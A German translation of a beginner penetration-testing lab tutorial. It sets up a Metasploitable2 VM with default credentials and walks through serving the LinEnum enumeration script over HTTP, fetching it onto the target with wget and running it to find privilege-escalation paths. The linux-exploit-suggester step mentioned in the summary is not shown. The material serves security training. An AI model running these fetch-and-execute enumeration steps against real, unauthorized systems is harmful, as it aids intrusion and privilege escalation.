Linux Privilege Escalation Tools in Nmap entdecken

Beginner

💡 Dieser Artikel wurde von AI-Assistenten übersetzt. Um die englische Version anzuzeigen, können Sie hier klicken

Einführung

In diesem Lab werden wir zwei der am häufigsten verwendeten Linux-Privilegierweiterungs-Automatisierungstools erkunden - LinEnum und linux-exploit-suggester. Das Ziel besteht darin, zu lernen, wie man diese Tools effektiv nutzt, um den Privilegierweiterungsprozess während eines Penetrationstests oder einer Sicherheitsbewertung zu beschleunigen. Das Beherrschen dieser Tools kann Zeit und Mühe erheblich sparen und es Ihnen ermöglichen, sich auf das Verständnis der zugrunde liegenden Prinzipien und Methoden der Privilegierweiterung zu konzentrieren.


Skills Graph

Einrichten der Umgebung

In diesem Schritt werden wir die Metasploitable2-Virtual Machine einrichten, die als unser Zielsystem dienen wird. Befolgen Sie die untenstehenden Anweisungen, um die Virtual Machine zu starten und eine Verbindung herzustellen:

In unserer Lab-Umgebung wurde die Metasploitable2-Virtual Machine bereits vorkonfiguriert. Sie können die Virtual Machine starten und sich mit ihr verbinden, indem Sie die folgenden Schritte ausführen:

  1. Öffnen Sie ein Terminal und führen Sie den folgenden Befehl aus, um die Metasploitable2-Virtual Machine zu starten:

    sudo virsh start Metasploitable2
  2. Warten Sie 1-2 Minuten, bis die Virtual Machine vollständig gestartet und bereit ist.

  3. Stellen Sie sicher, dass Sie von Ihrem Host-Rechner aus die IP-Adresse der Metasploitable2 (192.168.122.102) per Ping erreichen können.

  4. Verwenden Sie den folgenden Befehl, um sich via SSH mit der Metasploitable2-Virtual Machine zu verbinden:

    ssh msfadmin@192.168.122.102

    Bei der ersten Verbindung werden Sie aufgefordert, die Authentizität des Hosts zu akzeptieren. Geben Sie yes ein und drücken Sie Enter, um fortzufahren.

    Geben Sie dann bei entsprechender Aufforderung das msfadmin-Passwort ein:

    msfadmin

Nach erfolgreicher Authentifizierung sollten Sie eine Shell-Sitzung mit niedrigen Rechten auf der Metasploitable2-Virtual Machine haben.

LinEnum: Automatisierung der Linux-Systemenumeration

LinEnum ist ein leistungsstarkes Skript, das den Enumerationsprozess auf einem Linux-System automatisiert und wertvolle Informationen sammelt, die den Privilegierweiterungsprozess unterstützen können. Befolgen Sie die folgenden Schritte, um LinEnum auf der Metasploitable2-Virtual Machine zu verwenden:

  1. Öffnen Sie auf Ihrem Host-Rechner ein Terminal und navigieren Sie in das Verzeichnis /tmp:

    cd /tmp

    Im /tmp-Verzeichnis des Projekts befindet sich ein Skript namens LinEnum.sh.

  2. Starten Sie einen Python-HTTP-Server im /tmp-Verzeichnis, um das LinEnum-Skript bereitzustellen:

    python3 -m http.server 8000
  3. Navigieren Sie auf der Metasploitable2 VM in das /tmp-Verzeichnis und laden Sie das LinEnum-Skript mit wget vom auf Ihrem Host-Rechner laufenden Python-HTTP-Server herunter:

    Navigieren Sie in das /tmp-Verzeichnis:

    cd /tmp
    wget 192.168.122.1:8000/LinEnum.sh -P /tmp
  4. Machen Sie das LinEnum-Skript ausführbar:

    chmod +x LinEnum.sh
  5. Führen Sie das LinEnum-Skript aus und leiten Sie die Ausgabe in eine Datei um, um sie weiter zu analysieren:

    LinEnum.sh > linenum_output.txt

LinEnum führt verschiedene Prüfungen durch und listet Systeminformationen auf, wobei potenzielle Sicherheitslücken oder Fehleinstellungen in gelbem Text hervorgehoben werden. Achten Sie besonders auf diese hervorgehobenen Bereiche, da sie möglicherweise Chancen für eine Privilegierweiterung aufzeigen.

Zusammenfassung

In diesem Lab haben wir gelernt, wie man zwei leistungsstarke Automatisierungstools, LinEnum und linux-exploit-suggester, verwendet, um den Privilegierweiterungsprozess auf Linux-Systemen zu unterstützen. LinEnum bietet eine umfassende Enumeration von Systeminformationen und hebt potenzielle Sicherheitslücken und Fehleinstellungen hervor. Das linux-exploit-suggester-Tool analysiert die Kernel-Version und schlägt relevante Kernel-Exploits vor, die zu einer Privilegierweiterung führen könnten.

Durch die Nutzung dieser Tools können wir die Phasen der Informationsgewinnung und -analyse optimieren und so wertvolle Zeit während eines Penetrationstests oder einer Sicherheitsbewertung sparen. Es ist jedoch wichtig zu verstehen, dass diese Tools nur dazu dienen, den Prozess zu unterstützen, und dass ein solides Verständnis von Privilegierweiterungstechniken und -methoden für einen erfolgreichen Angriff immer noch unerlässlich ist.

Im Laufe dieses Labs haben wir das Einrichten einer anfälligen Virtual-Machine-Umgebung, das Herunterladen und Ausführen der LinEnum- und linux-exploit-suggester-Skripte sowie die Interpretation ihrer Ausgaben geübt. Die praktische Erfahrung, die wir aus diesem Lab gewonnen haben, wird in realen Szenarien unschätzbar sein, in denen eine effiziente und effektive Privilegierweiterung eine kritische Fähigkeit für ethische Hacker und Sicherheitsexperten ist.